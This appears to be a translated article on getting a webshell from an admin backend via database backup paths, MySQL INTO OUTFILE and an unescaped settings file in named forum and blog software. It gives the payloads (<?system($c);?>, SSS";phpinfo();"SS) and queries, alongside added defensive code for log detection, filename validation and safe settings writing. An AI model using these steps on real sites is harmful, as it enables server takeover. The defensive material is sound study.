Some thoughts on getting from the admin backstage to a webshell: vulnerability research
Source: Internet
Author: User
For Access-based programs the main vector is the backstage "Backup Database" or "Restore Database" function: variables such as the "backup database path" are not filtered, so the resulting file can be given an arbitrary extension such as .asp, which yields a webshell. The MSSQL version of the program reused the Access version's code directly, so the SQL version is exploitable the same way. For the specific method and analysis, refer to Angel's article "Dynamic Network Forum 7.0 to obtain Webshell analysis". As far as I know, many ASP programs have this kind of vulnerability in their backstage, and similar methods apply to them.
PHP + MySQL programs
① Using the backstage data query function
Some programs' backstage provides a direct MySQL query function. We can use it to run a SELECT ... INTO OUTFILE query that writes a PHP file: because all the data is stored in MySQL, we first insert our webshell code into MySQL by normal means, then use a SELECT ... INTO OUTFILE statement to export it as the shell. Here we use the IPB forum as a demo:
Step one: write the webshell code to the database
Just find a place to write it (make sure the input you use is not filtered). Here we create a new forum from the backstage and write our shell code <?system($c);?> into the forum description. Submit, and our shell is now stored in the database.
Step two: export the webshell
Go to "MySQL Toolbox", then "SQL Management", then "Run Query", and enter the statement:
SELECT * FROM 123forums INTO OUTFILE 'd:\\shell.php'
Here 123forums is the table that holds the shell code and d:\shell.php is the absolute path under the web directory (in a MySQL string literal the backslash has to be doubled, or a forward slash used). If the query succeeds on the host's MySQL, we get our webshell:
http://127.0.0.1/test/shell.php?c=dir
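From the defender's side, the durable fix for the INTO OUTFILE case above is on the server: MySQL's secure_file_priv setting confines INTO OUTFILE/LOAD_FILE to one directory (or disables them when set to NULL), and the application's database account should simply not hold the FILE privilege. What a backstage query console cannot hide is the query itself, so the following added example (not code from the article or from IPB) scans MySQL general-query-log lines for the three things this section relies on: a file write via INTO OUTFILE/DUMPFILE (rated critical when the target has a web-executable extension), a LOAD_FILE read, and a PHP/ASP tag being written into table data. The log excerpt is constructed for the example and its format is only an approximation of the real general log; string literals are tokenised first so a keyword appearing inside quoted data does not cause a false positive.

```python
import re
from typing import Dict, List, Optional

# Constructed MySQL general-query-log excerpt (format approximated:
# time, "id command", argument, tab separated). Not from a real server.
SAMPLE_LOG = (
    "2024-03-01T09:12:01Z\t   41 Query\tSELECT * FROM ibf_forums WHERE id = 7\n"
    "2024-03-01T09:12:05Z\t   41 Query\tUPDATE ibf_forums SET description = '<?system($c);?>' WHERE id = 7\n"
    "2024-03-01T09:12:40Z\t   41 Query\tSELECT * FROM 123forums INTO OUTFILE 'd:\\\\shell.php'\n"
    "2024-03-01T09:13:02Z\t   42 Query\tSELECT LOAD_FILE('/etc/hosts')\n"
    "2024-03-01T09:13:10Z\t   42 Query\tSELECT 1 INTO DUMPFILE '/var/lib/mysql-files/x.bin'\n"
    "2024-03-01T09:13:11Z\t   42 Query\tSELECT 'into outfile' AS note\n"
)

WEB_EXEC_EXT = (".php", ".phtml", ".asp", ".aspx", ".jsp")
STRING_LIT = re.compile(r"'(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\"")
# Literals are replaced by NUL-delimited indexes before keyword matching,
# so FILE_WRITE captures the index of the path literal rather than the path.
FILE_WRITE = re.compile(r"\bINTO\s+(?:OUTFILE|DUMPFILE)\s*\x00(\d+)\x00", re.I)
FILE_READ = re.compile(r"\bLOAD_FILE\s*\(", re.I)
DATA_WRITE = re.compile(r"^\s*(?:INSERT|UPDATE|REPLACE)\b", re.I)
SCRIPT_TAG = re.compile(r"<\?|<%")


def query_of(log_line: str) -> Optional[str]:
    """Return the SQL text of a 'Query' record, or None for other records."""
    parts = log_line.rstrip("\n").split("\t")
    if len(parts) < 3:
        return None
    id_and_cmd = parts[1].split()
    if len(id_and_cmd) < 2 or id_and_cmd[1] != "Query":
        return None
    return "\t".join(parts[2:])


def split_literals(sql: str):
    """Replace each string literal with a NUL-delimited index so keyword
    matching cannot be fooled by text inside quotes; return (sql, literals)."""
    literals: List[str] = []

    def keep(m):
        literals.append(m.group(0))
        return f"\x00{len(literals) - 1}\x00"

    return STRING_LIT.sub(keep, sql), literals


def scan_queries(log_text: str) -> List[Dict]:
    """Return one finding dict per suspicious query, in log order."""
    findings: List[Dict] = []
    for lineno, line in enumerate(log_text.splitlines(), 1):
        sql = query_of(line)
        if sql is None:
            continue
        skeleton, literals = split_literals(sql)
        m = FILE_WRITE.search(skeleton)
        if m:
            # Recover the target path: drop the quotes, undo MySQL's backslash escaping.
            target = literals[int(m.group(1))][1:-1].replace("\\\\", "\\")
            sev = "critical" if target.lower().endswith(WEB_EXEC_EXT) else "high"
            findings.append({"line": lineno, "rule": "file_write",
                             "severity": sev, "target": target})
        if FILE_READ.search(skeleton):
            findings.append({"line": lineno, "rule": "file_read",
                             "severity": "medium", "target": None})
        if DATA_WRITE.match(skeleton) and any(SCRIPT_TAG.search(s) for s in literals):
            findings.append({"line": lineno, "rule": "script_tag_in_data",
                             "severity": "high", "target": None})
    return findings


if __name__ == "__main__":
    for finding in scan_queries(SAMPLE_LOG):
        print(finding)
```

Run against the sample, the scanner reports lines 2 to 5 and stays quiet on line 6, where "into outfile" only occurs inside a string. The general log is expensive on a busy server; the same rules apply unchanged to audit-plugin output or to the query log of the backstage application itself, which is where the "Run Query" feature should have been logging in the first place.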
② Using MySQL database backup
Combining the two cases above: in some programs the database backup function does not restrict the type of the backup file, so it can export a PHP file. As in ①, we write the webshell code into the database and then use the data backup function to export the webshell. The vBB forum we are all familiar with can be handled this way: set the user's signature to <?system($c);?>, then go to the backstage database backup, enter shell.php in "Back up database to file on the server", and submit to save. We can then access our shell at the forum root. Because the exported file may be large, we can also change the webshell code so that it generates the file.
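Both the Access "backup database path" case at the top of the page and the "back up database to file on the server" case in ② come down to the same missing check: the backstage lets the user choose the extension and the directory of a file the server is about to write. The following added example (not code from any of the programs named on this page) shows the check a maintainer would put in front of that write: no directory components, a whitelist of database extensions, a conservative name pattern that also rejects double extensions, and a final containment check on the resolved path. The backup directory is an assumed location.

```python
import os
import re

# Added example (not the original programs' code): a hardened handler for a
# user-supplied backup file name. The backup directory is an assumption.
BACKUP_DIR = "/var/app/backups"
ALLOWED_EXT = {".mdb", ".bak", ".sql"}      # database backups only, never .asp/.php
NAME_RE = re.compile(r"^[A-Za-z0-9_-]{1,64}$")


class BadBackupName(ValueError):
    """Raised when the submitted name could place or name a file unsafely."""


def safe_backup_path(user_name: str, backup_dir: str = BACKUP_DIR) -> str:
    """Map a submitted backup name to an absolute path inside backup_dir.

    Both weaknesses described on this page are closed here: the file can
    only get a whitelisted database extension (no .asp/.php), and it can
    only land in the fixed backup directory (no web-root path).
    """
    if any(ch in user_name for ch in "/\\\x00"):
        raise BadBackupName("directory separators and NUL are not allowed")
    stem, ext = os.path.splitext(user_name)
    if ext.lower() not in ALLOWED_EXT:
        raise BadBackupName(f"extension {ext!r} is not a database backup type")
    if not NAME_RE.match(stem):
        # Also rejects "shell.asp.mdb"-style double extensions, because the
        # stem "shell.asp" contains a dot.
        raise BadBackupName("name must be 1-64 letters, digits, '_' or '-'")
    root = os.path.realpath(backup_dir)
    full = os.path.realpath(os.path.join(root, stem + ext.lower()))
    if os.path.commonpath([root, full]) != root:
        raise BadBackupName("resolved path escapes the backup directory")
    return full


def is_safe_backup_name(user_name: str) -> bool:
    """Boolean form of the check, convenient for form validation."""
    try:
        safe_backup_path(user_name)
        return True
    except BadBackupName:
        return False


if __name__ == "__main__":
    for candidate in ["forum_2024.mdb", "shell.asp", "shell.asp.mdb",
                      "..\\wwwroot\\shell.asp", "../wwwroot/x.mdb"]:
        print(f"{candidate!r:28} -> {is_safe_backup_name(candidate)}")
```

The order of the checks matters: the separator test runs on the raw input before any path function touches it, so nothing is "cleaned" into acceptability, and the containment check at the end is a belt-and-braces guard rather than the primary defence. The same function serves the restore side, where a user-chosen path is read instead of written.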
Supplementary idea
Use the web backstage's system settings: if the system settings are saved into a php/asp file, we can put the webshell code into a setting so that it gets saved into that php/asp file.
Demonstration
The basic settings of the Sablog program are saved in admin\settings.php. Because the backstage does not filter the variables submitted from the settings form, we can write arbitrary code into admin\settings.php.
Go to the backstage, then "Basic settings", then "Blog name" (other items work as well), fill in the code SSS";phpinfo();"SS and submit.
This writes phpinfo() into admin\settings.php, and opening admin\settings.php now displays the PHP information page normally.
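The Sablog case is a code-generation bug: the settings form is pasted into a PHP source file as a double-quoted literal, so the quote in SSS";phpinfo();"SS ends the literal and the rest is parsed as PHP. The following added example (not Sablog's code; setting names and file layout are assumptions) shows that unsafe writer beside a safe one that whitelists setting names and encodes each value as a PHP single-quoted literal (the same encoding var_export() produces), plus a parser that checks a written line is exactly one assignment of one string literal, which is how a test or a code reviewer can confirm that no submitted value can become a statement.

```python
import re

# Added example (not Sablog's code): writing admin "basic settings" into a
# PHP settings file, the pattern described above, in its unsafe and safe
# form. Setting names and the file layout are assumptions.

NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")


def render_settings_vulnerable(settings: dict) -> str:
    """Pastes each submitted value straight into a double-quoted PHP literal.
    A value containing a double quote ends the literal, and whatever follows
    is parsed as PHP code when the settings file is included."""
    lines = ["<?php"]
    for name, value in settings.items():
        lines.append(f'${name} = "{value}";')
    return "\n".join(lines) + "\n"


def php_single_quoted(value: str) -> str:
    """Encode value as a PHP single-quoted literal. Inside '...' PHP gives
    meaning only to \\' and \\\\, so escaping exactly those two characters is
    complete; this is the encoding var_export() uses for strings."""
    return "'" + value.replace("\\", "\\\\").replace("'", "\\'") + "'"


def render_settings_safe(settings: dict) -> str:
    """Same file layout, but names are whitelisted and values are encoded,
    so a submitted value can never become anything but string data."""
    lines = ["<?php"]
    for name, value in settings.items():
        if not NAME_RE.match(name):
            raise ValueError(f"refusing to write setting name {name!r}")
        lines.append(f"${name} = {php_single_quoted(str(value))};")
    return "\n".join(lines) + "\n"


ASSIGN_RE = re.compile(r"^\$([A-Za-z_][A-Za-z0-9_]*) = '((?:[^'\\]|\\.)*)';$")


def parse_settings_line(line: str):
    """Decode one line written by render_settings_safe back to (name, value).
    Returns None unless the line is exactly one assignment of one string
    literal, which is the property that rules out injected statements."""
    m = ASSIGN_RE.match(line)
    if not m:
        return None
    return m.group(1), re.sub(r"\\([\\'])", r"\1", m.group(2))


if __name__ == "__main__":
    payload = 'SSS";phpinfo();"SS'           # the test input from the article
    print(render_settings_vulnerable({"blog_name": payload}))
    print(render_settings_safe({"blog_name": payload}))
```

The stronger fix is to stop generating executable code for configuration altogether (a JSON or INI file under a non-web-served directory), but where a settings.php is kept for compatibility, encoding values with var_export() semantics and refusing unexpected names is what turns a code-injection bug into plain data storage.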
Summary
The above is a demo on PHP systems; it applies just as well to other systems such as ASP (for example Power, Cloud Download, etc.). Just be careful when writing the code: if the code is wrong, it can paralyze the entire web system.
There is also a method that uses upload vulnerabilities, which I won't talk about here, hehe.